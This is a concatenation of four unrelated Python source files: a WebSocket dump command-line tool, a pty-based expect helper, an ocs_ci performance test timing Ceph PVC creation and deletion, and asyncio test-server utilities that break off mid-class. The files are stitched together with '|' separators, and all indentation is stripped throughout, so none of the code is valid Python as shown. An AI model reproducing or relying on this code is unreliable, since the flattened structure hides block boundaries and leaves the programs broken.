OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": websocket.ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
uexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pty
import time
import sys
import re
from threading import Thread, Event
from subprocess import Popen
from queue import Queue, Empty
class TimeoutError(Exception):
def __init__(self, timeout):
self.timeout = timeout
def __str__(self):
return 'Timeout %.3fs' % float(self.timeout)
class ExpectTimeoutError(Exception):
def __init__(self, pattern, timeout, buffer):
self.pattern = pattern
self.timeout = timeout
self.buffer = buffer
def __str__(self):
s = 'Timeout %.3fs ' % float(self.timeout)
if self.pattern:
s += 'for %s ' % repr(self.pattern.pattern)
if self.buffer:
s += 'buffer %s' % repr(self.buffer[:])
#s += ' or \'%s\'' % ','.join(['%x' % ord(c) for c in self.buffer[:]])
return s
class IO(object):
class EOF(object):
pass
class Timeout(object):
pass
EOF = EOF
TIMEOUT = Timeout
class Logger(object):
def __init__(self, logger, prefix=''):
self._logger = logger
self._prefix = prefix
def write(self, data):
self._logger.write(('\n' + data).replace('\n','\n' + self._prefix))
def flush(self):
self._logger.flush()
def __init__(self, process, master, queue, reader):
self.process = process
self.master = master
self.queue = queue
self.buffer = None
self.before = None
self.after = None
self.match = None
self.pattern = None
self.reader = reader
self._timeout = None
self._logger = None
self._eol = ''
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def logger(self, logger=None, prefix=''):
if logger:
self._logger = self.Logger(logger, prefix=prefix)
return self._logger
def timeout(self, timeout=None):
if timeout:
self._timeout = timeout
return self._timeout
def eol(self, eol=None):
if eol:
self._eol = eol
return self._eol
def close(self, force=True):
self.reader['kill_event'].set()
os.system('pkill -TERM -P %d' % self.process.pid)
if force:
self.process.kill()
else:
self.process.terminate()
os.close(self.master)
if self._logger:
self._logger.write('\n')
self._logger.flush()
def send(self, data, eol=None):
if eol is None:
eol = self._eol
return self.write(data + eol)
def write(self, data):
return os.write(self.master, data.encode())
def expect(self, pattern, timeout=None, escape=False):
self.match = None
self.before = None
self.after = None
if escape:
pattern = re.escape(pattern)
pattern = re.compile(pattern)
if timeout is None:
timeout = self._timeout
timeleft = timeout
while True:
start_time = time.time()
if self.buffer is not None:
self.match = pattern.search(self.buffer, 0)
if self.match is not None:
self.after = self.buffer[self.match.start():self.match.end()]
self.before = self.buffer[:self.match.start()]
self.buffer = self.buffer[self.match.end():]
break
if timeleft < 0:
break
try:
data = self.read(timeout=timeleft, raise_exception=True)
except TimeoutError:
if self._logger:
self._logger.write((self.buffer or '') + '\n')
self._logger.flush()
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
timeleft -= (time.time() - start_time)
if data:
self.buffer = (self.buffer + data) if self.buffer else data
if self._logger:
self._logger.write((self.before or '') + (self.after or ''))
self._logger.flush()
if self.match is None:
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
return self.match
def read(self, timeout=0, raise_exception=False):
data = ''
timeleft = timeout
try:
while timeleft >= 0 :
start_time = time.time()
data += self.queue.get(timeout=timeleft)
if data:
break
timeleft -= (time.time() - start_time)
except Empty:
if data:
return data
if raise_exception:
raise TimeoutError(timeout)
pass
if not data and raise_exception:
raise TimeoutError(timeout)
return data
def spawn(command):
master, slave = pty.openpty()
process = Popen(command, preexec_fn=os.setsid, stdout=slave, stdin=slave, stderr=slave, bufsize=1)
os.close(slave)
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(process, master, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(process, master, queue, reader={'thread':thread, 'kill_event':reader_kill_event})
def reader(process, out, queue, kill_event):
while True:
try:
data = os.read(out, 65536).decode(errors='replace')
queue.put(data)
except:
if kill_event.is_set():
break
raise
|
test_pvc_creation_deletion_performance.py
|
"""
Test to verify performance of PVC creation and deletion
for RBD, CephFS and RBD-Thick interfaces
"""
import time
import logging
import datetime
import pytest
import ocs_ci.ocs.exceptions as ex
import threading
import statistics
from concurrent.futures import ThreadPoolExecutor
from uuid import uuid4
from ocs_ci.framework.testlib import performance
from ocs_ci.ocs.perftests import PASTest
from ocs_ci.helpers import helpers, performance_lib
from ocs_ci.ocs import constants
from ocs_ci.utility.performance_dashboard import push_to_pvc_time_dashboard
from ocs_ci.helpers.helpers import get_full_test_logs_path
from ocs_ci.ocs.perfresult import PerfResult
from ocs_ci.framework import config
log = logging.getLogger(__name__)
class ResultsAnalyse(PerfResult):
"""
This class generates results for all tests as one unit
and saves them to an elastic search server on the cluster
"""
def __init__(self, uuid, crd, full_log_path):
"""
Initialize the object by reading some of the data from the CRD file and
by connecting to the ES server and read all results from it.
Args:
uuid (str): the unique uid of the test
crd (dict): dictionary with test parameters - the test yaml file
that modify it in the test itself.
full_log_path (str): the path of the results files to be found
"""
super(ResultsAnalyse, self).__init__(uuid, crd)
self.new_index = "pvc_create_delete_fullres"
self.full_log_path = full_log_path
# make sure we have connection to the elastic search server
self.es_connect()
@performance
class TestPVCCreationDeletionPerformance(PASTest):
"""
Test to verify performance of PVC creation and deletion
"""
def setup(self):
"""
Setting up test parameters
"""
log.info("Starting the test setup")
super(TestPVCCreationDeletionPerformance, self).setup()
self.benchmark_name = "PVC_Creation-Deletion"
self.uuid = uuid4().hex
self.crd_data = {
"spec": {
"test_user": "Homer simpson",
"clustername": "test_cluster",
"elasticsearch": {
"server": config.PERF.get("production_es_server"),
"port": config.PERF.get("production_es_port"),
"url": f"http://{config.PERF.get('production_es_server')}:{config.PERF.get('production_es_port')}",
},
}
}
if self.dev_mode:
self.crd_data["spec"]["elasticsearch"] = {
"server": config.PERF.get("dev_es_server"),
"port": config.PERF.get("dev_es_port"),
"url": f"http://{config.PERF.get('dev_es_server')}:{config.PERF.get('dev_es_port')}",
}
@pytest.fixture()
def base_setup(self, interface_type, storageclass_factory, pod_factory):
"""
A setup phase for the test
Args:
interface_type: A fixture to iterate over ceph interfaces
storageclass_factory: A fixture to create everything needed for a
storageclass
pod_factory: A fixture to create new pod
"""
self.interface = interface_type
if self.interface == constants.CEPHBLOCKPOOL_THICK:
self.sc_obj = storageclass_factory(
interface=constants.CEPHBLOCKPOOL,
new_rbd_pool=True,
rbd_thick_provision=True,
)
else:
self.sc_obj = storageclass_factory(self.interface)
self.pod_factory = pod_factory
@pytest.fixture()
def namespace(self, project_factory):
"""
Create a new project
"""
proj_obj = project_factory()
self.namespace = proj_obj.namespace
def init_full_results(self, full_results):
"""
Initialize the full results object which will send to the ES server
Args:
full_results (obj): an empty FIOResultsAnalyse object
Returns:
FIOResultsAnalyse (obj): the input object fill with data
"""
for key in self.environment:
full_results.add_key(key, self.environment[key])
full_results.add_key("storageclass", self.sc)
full_results.add_key("index", full_results.new_index)
return full_results
@pytest.mark.parametrize(
argnames=["interface_type", "pvc_size"],
argvalues=[
pytest.param(
*[constants.CEPHBLOCKPOOL, "5Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL, "15Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL, "25Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "5Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "15Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "25Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "5Gi"],
marks=[pytest.mark.performance_extended],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "15Gi"],
marks=[pytest.mark.performance_extended],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "25Gi"],
marks=[pytest.mark.performance_extended],
),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
def test_pvc_creation_deletion_measurement_performance(
self, teardown_factory, pvc_size
):
"""
Measuring PVC creation and deletion times for pvc samples
Verifying that those times are within the required limits
"""
# Getting the full path for the test logs
self.full_log_path = get_full_test_logs_path(cname=self)
if self.interface == constants.CEPHBLOCKPOOL:
self.sc = "RBD"
elif self.interface == constants.CEPHFILESYSTEM:
self.sc = "CephFS"
elif self.interface == constants.CEPHBLOCKPOOL_THICK:
self.sc = "RBD-Thick"
self.full_log_path += f"-{self.sc}-{pvc_size}"
log.info(f"Logs file path name is : {self.full_log_path}")
self.start_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.get_env_info()
# Initialize the results doc file.
self.full_results = self.init_full_results(
ResultsAnalyse(self.uuid, self.crd_data, self.full_log_path)
)
self.full_results.add_key("pvc_size", pvc_size)
num_of_samples = 5
accepted_creation_time = (
600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 1
)
# accepted deletion time for RBD is 1 sec, for CephFS is 2 secs and for RBD Thick is 5 secs
if self.interface == constants.CEPHFILESYSTEM:
accepted_deletion_time = 2
elif self.interface == constants.CEPHBLOCKPOOL:
accepted_deletion_time = 1
else:
accepted_deletion_time = 5
self.full_results.add_key("samples", num_of_samples)
accepted_creation_deviation_percent = 50
accepted_deletion_deviation_percent = 50
creation_time_measures = []
deletion_time_measures = []
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
for i in range(num_of_samples):
logging.info(f"{msg_prefix} Start creating PVC number {i + 1}.")
start_time = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
pvc_obj = helpers.create_pvc(sc_name=self.sc_obj.name, size=pvc_size)
timeout = 600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 60
helpers.wait_for_resource_state(
pvc_obj, constants.STATUS_BOUND, timeout=timeout
)
pvc_obj.reload()
creation_time = performance_lib.measure_pvc_creation_time(
self.interface, pvc_obj.name, start_time
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was created in {creation_time} seconds."
)
if creation_time > accepted_creation_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC creation time is {creation_time} and is greater than "
f"{accepted_creation_time} seconds."
)
creation_time_measures.append(creation_time)
pv_name = pvc_obj.backed_pv
pvc_reclaim_policy = pvc_obj.reclaim_policy
pod_obj = self.write_file_on_pvc(pvc_obj)
pod_obj.delete(wait=True)
teardown_factory(pvc_obj)
logging.info(f"{msg_prefix} Start deleting PVC number {i + 1}")
if pvc_reclaim_policy == constants.RECLAIM_POLICY_DELETE:
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
helpers.validate_pv_delete(pvc_obj.backed_pv)
deletion_time = helpers.measure_pvc_deletion_time(
self.interface, pv_name
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was deleted in {deletion_time} seconds."
)
if deletion_time > accepted_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC deletion time is {deletion_time} and is greater than "
f"{accepted_deletion_time} seconds."
)
deletion_time_measures.append(deletion_time)
else:
logging.info(
f"Reclaim policy of the PVC {pvc_obj.name} is not Delete;"
f" therefore not measuring deletion time for this PVC."
)
creation_average = self.process_time_measurements(
"creation",
creation_time_measures,
accepted_creation_deviation_percent,
msg_prefix,
)
self.full_results.add_key("creation-time", creation_average)
deletion_average = self.process_time_measurements(
"deletion",
deletion_time_measures,
accepted_deletion_deviation_percent,
msg_prefix,
)
self.full_results.add_key("deletion-time", deletion_average)
self.full_results.all_results["creation"] = creation_time_measures
self.full_results.all_results["deletion"] = deletion_time_measures
self.end_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.full_results.add_key(
"test_time", {"start": self.start_time, "end": self.end_time}
)
self.full_results.es_write()
log.info(f"The Result can be found at : {self.full_results.results_link()}")
if not self.dev_mode:
# all the results are OK, the test passes, push the results to the codespeed
push_to_pvc_time_dashboard(
self.interface, "1-pvc-creation", creation_average
)
push_to_pvc_time_dashboard(
self.interface, "1-pvc-deletion", deletion_average
)
def process_time_measurements(
self, action_name, time_measures, accepted_deviation_percent, msg_prefix
):
"""
Analyses the given time measured. If the standard deviation of these times is bigger than the
provided accepted deviation percent, fails the test
Args:
action_name (str): Name of the action for which these measurements were collected; used for the logging
time_measures (list of floats): A list of time measurements
accepted_deviation_percent (int): Accepted deviation percent to which computed standard deviation may be
compared
msg_prefix (str) : A string for comprehensive logging
Returns:
(float) The average value of the provided time measurements
"""
average = statistics.mean(time_measures)
log.info(
f"{msg_prefix} The average {action_name} time for the sampled {len(time_measures)} "
f"PVCs is {average} seconds."
)
if self.interface == constants.CEPHBLOCKPOOL_THICK:
st_deviation = statistics.stdev(time_measures)
st_deviation_percent = st_deviation / average * 100.0
if st_deviation_percent > accepted_deviation_percent:
log.error(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}% which is bigger than accepted {accepted_deviation_percent}."
)
else:
log.info(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}% and is within the accepted range."
)
self.full_results.add_key(
f"{action_name}_deviation_pct", st_deviation_percent
)
return average
def write_file_on_pvc(self, pvc_obj, filesize=1):
"""
Writes a file on given PVC
Args:
pvc_obj: PVC object to write a file on
filesize: size of file to write (in GB - default is 1GB)
Returns:
Pod on this pvc on which the file was written
"""
pod_obj = self.pod_factory(
interface=self.interface, pvc=pvc_obj, status=constants.STATUS_RUNNING
)
# filesize to be written is always 1 GB
file_size = f"{int(filesize * 1024)}M"
log.info(f"Starting IO on the POD {pod_obj.name}")
# Going to run only write IO
pod_obj.fillup_fs(size=file_size, fio_filename=f"{pod_obj.name}_file")
# Wait for the fio to finish
fio_result = pod_obj.get_fio_results()
err_count = fio_result.get("jobs")[0].get("error")
assert (
err_count == 0
), f"IO error on pod {pod_obj.name}. FIO result: {fio_result}"
log.info("IO on the PVC has finished")
return pod_obj
@pytest.mark.parametrize(
argnames=["interface_type"],
argvalues=[
pytest.param(
*[constants.CEPHBLOCKPOOL],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK],
marks=[pytest.mark.performance_extended],
),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
@pytest.mark.usefixtures(namespace.__name__)
@pytest.mark.polarion_id("OCS-2618")
def test_multiple_pvc_deletion_measurement_performance(self, teardown_factory):
"""
Measuring PVC deletion time of 120 PVCs in 180 seconds
Args:
teardown_factory: A fixture used when we want a new resource that was created during the tests
to be removed in the teardown phase.
Returns:
"""
number_of_pvcs = 120
pvc_size = "1Gi"
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
log.info(f"{msg_prefix} Start creating new 120 PVCs")
pvc_objs = helpers.create_multiple_pvcs(
sc_name=self.sc_obj.name,
namespace=self.namespace,
number_of_pvc=number_of_pvcs,
size=pvc_size,
burst=True,
)
for pvc_obj in pvc_objs:
pvc_obj.reload()
teardown_factory(pvc_obj)
timeout = 600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 60
with ThreadPoolExecutor(max_workers=5) as executor:
for pvc_obj in pvc_objs:
executor.submit(
helpers.wait_for_resource_state,
pvc_obj,
constants.STATUS_BOUND,
timeout=timeout,
)
executor.submit(pvc_obj.reload)
pod_objs = []
for pvc_obj in pvc_objs:
pod_obj = self.write_file_on_pvc(pvc_obj, 0.3)
pod_objs.append(pod_obj)
# Get pvc_name, require pvc_name to fetch deletion time data from log
threads = list()
for pvc_obj in pvc_objs:
process = threading.Thread(target=pvc_obj.reload)
process.start()
threads.append(process)
for process in threads:
process.join()
pvc_name_list, pv_name_list = ([] for i in range(2))
threads = list()
for pvc_obj in pvc_objs:
process1 = threading.Thread(target=pvc_name_list.append(pvc_obj.name))
process2 = threading.Thread(target=pv_name_list.append(pvc_obj.backed_pv))
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
log.info(f"{msg_prefix} Preparing to delete 120 PVC")
# Delete PVC
for pvc_obj, pod_obj in zip(pvc_objs, pod_objs):
pod_obj.delete(wait=True)
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
# Get PVC deletion time
pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=self.interface, pv_name_list=pv_name_list
)
log.info(
f"{msg_prefix} {number_of_pvcs} bulk deletion time is {pvc_deletion_time}"
)
# accepted deletion time is 2 secs for each PVC
accepted_pvc_deletion_time = number_of_pvcs * 2
for del_time in pvc_deletion_time.values():
if del_time > accepted_pvc_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} {number_of_pvcs} PVCs deletion time is {pvc_deletion_time.values()} and is "
f"greater than {accepted_pvc_deletion_time} seconds"
)
logging.info(f"{msg_prefix} {number_of_pvcs} PVCs deletion times are:")
for name, a_time in pvc_deletion_time.items():
logging.info(f"{name} deletion time is: {a_time} seconds")
|
utils.py
|
"""Utilities shared by tests."""
import asyncio
import collections
import contextlib
import io
import logging
import os
import re
import selectors
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
import weakref
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from asyncio import base_events
from asyncio import events
from asyncio import format_helpers
from asyncio import futures
from asyncio import tasks
from asyncio.log import logger
from test import support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), '..', filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
def simple_server_sslcontext():
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
return server_context
def simple_client_sslcontext(*, disable_verify=True):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.check_hostname = False
if disable_verify:
client_context.verify_mode = ssl.CERT_NONE
return client_context
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_TLS)
def run_briefly(loop):
async def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=support.SHORT_TIMEOUT):
deadline = time.monotonic() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.monotonic()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001))
def run_once(loop):
"""Legacy API to run once through the event loop.
This is the recommended pattern for test code. It will poll the
selector once and run all callbacks scheduled in response to I/O
events.
"""
loop.call_soon(loop.stop)
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
request_timeout = support.LOOPBACK_TIMEOUT
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
context = ssl.SSLContext()
context.load_cert_chain(ONLYCERT, ONLYKEY)
ssock = context.wrap_socket(request, server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def loop(environ):
size = int(environ['CONTENT_LENGTH'])
while size:
data = environ['wsgi.input'].read(min(size, 0x10000))
yield data
size -= len(data)
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
if environ['PATH_INFO'] == '/loop':
return loop(environ)
else:
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(
target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
request_timeout = support.LOOPBACK_TIMEOUT
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer)
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
self._transports = weakref.WeakValueDictionary()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super().close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def _add_reader(self, fd, callback, *args):
self.readers[fd] = events.Handle(callback, args, self, None)
def _remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
if fd not in self.readers:
raise AssertionError(f'fd {fd} is not registered')
handle = self.readers[fd]
if handle._callback != callback:
raise AssertionError(
f'unexpected callback: {handle._callback} != {callback}')
if handle._args != args:
raise AssertionError(
f'unexpected callback args: {handle._args} != {args}')
def assert_no_reader(self, fd):
if fd in self.readers:
raise AssertionError(f'fd {fd} is registered')
def _add_writer(self, fd, callback, *args):
self.writers[fd] = events.Handle(callback, args, self, None)
def _remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(
handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(
handle._args, args)
def _ensure_fd_no_transport(self, fd):
if not isinstance(fd, int):
try:
fd = int(fd.fileno())
except (AttributeError, TypeError, ValueError):
# This code matches selectors._fileobj_to_fd function.
raise ValueError("Invalid file object: "
"{!r}".format(fd)) from None
try:
transport = self._transports[fd]
except KeyError:
pass
else:
raise RuntimeError(
'File descriptor {!r} is used by transport {!r}'.format(
fd, transport))
